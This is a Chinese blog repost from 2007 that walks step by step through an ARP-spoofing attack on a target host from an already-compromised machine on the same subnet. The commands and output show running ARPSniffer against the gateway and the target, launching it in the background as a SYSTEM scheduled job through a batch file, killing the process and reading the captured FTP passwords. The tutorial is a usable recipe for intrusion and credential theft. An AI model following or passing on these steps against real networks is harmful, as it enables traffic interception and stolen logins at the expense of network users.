ITPub博客

首页 > IT基础架构 > 网络安全 > 典型攻击之渗透攻击必用命令与步骤(转)

典型攻击之渗透攻击必用命令与步骤(转)

原创 网络安全 作者:RegisterForBlog 时间:2007-09-19 18:55:25 0 删除 编辑
典型攻击之渗透攻击必用命令与步骤(转)[@more@]

  假设想攻击的主机IP是:61.139.1.79

  同一子网下我们已有权限的主机IP是:61.139.1.88并可以3389登陆

  第一步:

  tracert 61.139.1.1

  C:WIN2000system32>tracert 61.139.1.1

  Tracing route to HACK-4FJ7EARC [61.139.1.1]

  over a maximum of 30 hops:

  1 <10 ms <10 ms <10 ms HACK-4FJ7EARC [61.139.1.1]

  Trace complete.

  这就说明了你想攻击的主机和你所在的主机在一个关网中那么就有可能

  进行ARPSNIFFER了

  第二步:看本机IP设置和网卡情况

  C:WIN2000system32>ipconfig /all

  Windows 2000 IP Configuration

  Host Name . . . . . . . . . . . . : smscomputer

  Primary DNS Suffix . . . . . . . :

  Node Type . . . . . . . . . . . . : Broadcast

  IP Routing Enabled. . . . . . . . : No

  WINS Proxy Enabled. . . . . . . . : No

  Ethernet adapter Intel Fast Ethernet LAN Controller - onboard:

  Connection-specific DNS Suffix . :

  Description . . . . . . . . . . . : Intel(R) 8255x Based Network Connection

  Physical Address. . . . . . . . . : 00-B0-D0-22-10-C6

  DHCP Enabled. . . . . . . . . . . : No

  IP Address. . . . . . . . . . . . : 61.139.1.2

  Subnet Mask . . . . . . . . . . . : 255.255.255.0

  Default Gateway . . . . . . . . . : 61.139.1.65

  DNS Servers . . . . . . . . . . . : 61.139.1.73

  说明只有一块网卡那么在执行ARPSNIFFER的时候就可以不要第五个参数了这个地

  方小榕的主页可没有说哟,经过测试我发觉如果只有一块网卡你第五个参数使用0

  的话也只能嗅探到通过自已的数据哟.

  从上面我们还可以知道网关是61.139.1.65

  第三步:查看本机时间

  C:WIN2000system32>net time 127.0.0.1

  127.0.0.1 的当前时间是 2003/1/28 下午 09:13

  命令完成成功

  要注意的是这儿的时间是12小时式,用at命令应要24小时式

  第四步:编写启动ARPsniffer的bat文件

  C:WIN2000system32>echo arpsniffer 61.139.1.65 61.139.1.79 21 1.txt /reset>c:winnta.bat

  注意咯我们没有要第五个参数,如果有多个网卡的话你就要先直接执行arpsniffer显示如下:

  ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB

  www.netXeyes.com 2002, security@vip.sina.com

  Network Adapter 0: D-Link DE-528 Ethernet PCI Adapter

  Network Adapter 1: Intel(R) PRO/100+ PCI Adapter(这个地方选第五个参数)

  Usage: ArpSniffer [/RESET]

  第五步:后台运行开始嗅探咯

  C:winntsystem32>at 127.0.0.1 20:44 c:winnta.bat

  注意:这儿的时间要用24小时式

  arpsniffer最好拷到system32目录下,记录文件也会生成在这儿

  执行完第四步要先安装WINPCAP 2.1驱动

  同时arpsniffer要使用最新的0.5版,老版本有不少BUG而且要改注册表重启机子

  第六步:看密码但是生成的记录文件不能直接看也不能拷贝所以我们只能先结束掉

  以SYSTEM权限启动的ARPSniffer程序

  C:winntsystem32>pulist

  ...................

  conime.exe 248 NT AUTHORITYSYSTEM

  explorer.exe 1864 SMSCOMPUTERAdministrator

  CSRSS.EXE 2256 NT AUTHORITYSYSTEM

  Arpsniffer.exe 2322 NT AUTHORITYSYSTEM ----就是它了!

  WINLOGON.EXE 2344 NT AUTHORITYSYSTEM

  ......................

  杀了它

  C:winntsystem32>pskill 2322

  PsKill v1.03 - local and remote process killer

  Copyright (C) 2000 Mark Russinovich

  http://www.sysinternals.com

  Process 2322 killed.

  C:winntsystem32>type 1.txt 我的例子中嗅探的是FTP密码:)

  ...............

  61.188.218.179(1404)->61.139.1.79(21)PASS aaabbb

  61.139.1.79(21)->61.188.218.179(1404)530 User czy82 cannot log in.

  61.139.1.79(21)->61.188.218.179(1404)530 User czy82 cannot log in.

  61.188.218.179(1404)->61.139.1.79(21)QUIT

  61.188.218.179(1404)->61.139.1.79(21)QUIT

  61.139.1.79(21)->61.188.218.179(1404)221

  61.139.1.79(21)->61.188.218.179(1404)221

  ............

  ............

  特别要注意的就是PASS哈:)

  ----------------------------------------------------

  付录:

  前台正常执行的显示

  C:>arpsniffer 61.139.1.65 61.139.1.79 21 1.txt /reset

  ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB

  www.netXeyes.com 2002, security@vip.sina.com

  Network Adapter 0: Intel(R) 8255x Based Network Connection

  Enable IP Router....OK

  Get 61.139.1.65 Hardware Address: 00-00-0c-07-ac-02

  Get 61.139.1.79 Hardware Address: 00-b0-d0-22-10-cb

  Get 61.139.1.88 Hardware Address: 00-b0-d0-22-10-c6

  Spoof 61.139.1.79: Mac of 61.139.1.65 ===> Mac of 61.139.1.88

  Spoof 61.139.1.65: Mac of 61.139.1.79 ===> Mac of 61.139.1.88

  有时这儿要先显示can not open driver(0)不管它等一下就可以了

  Begin Sniffer.........

  

本文来自:http://www.linuxpk.com/30609.html

-->linux电子图书免费下载和技术讨论基地

·上一篇:克隆admin!CA.EXE使黑客成为超级用户

·下一篇:黑客技术大放送,欺骗IP攻击的追踪
 
     最新更新
·注册表备份和恢复

·低级格式化的主要作用

·如何防范恶意网站

·常见文件扩展名和它们的说明

·专家:警惕骇客骗局,严守企业信息

·PGPforWindows介紹基本设定(2)

·解剖安全帐号管理器(SAM)结构

·“恶作剧之王”揭秘

·绿色警戒

·黑客反击战

·网络四大攻击方法及安全现状描述

·可攻击3种浏览器代码流于互联网

·黑客最新的兴趣点,下个目标会是谁?

·“僵尸”——垃圾邮件的主要传播源

·Lebreat蠕虫惊现3变种

·POSTFIX反病毒反垃圾Ų…

·在FreeBSD上用PHP实现在线添加FTP用户

·简单让你在FreeBSDADSL上…

·安全版本:OpenBSD入门技巧解析

·Internet连接共享上网完全攻略

·关于ADSL上网网速常识

·静态缓存和动态缓存的比较

·最友好的SQL注入防御方法

·令网站提速的7大秘方

·网络基础知识大全

·路由基本知识

·端口映射的几种实现方法

·VLAN经典诠释

·问题分析与解决——ADSL错误代码

·问题分析——关于2条E1的线路绑定


关于我们 | 联系方式 | 广告合作 | 诚聘英才 | 网站地图 | 网址大全 | 友情链接 | 免费注册

Copyright © 2004 - 2007 All Rights Reserved

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/10763080/viewspace-970158/,如需转载,请注明出处,否则将追究法律责任。

请登录后发表评论 登录
全部评论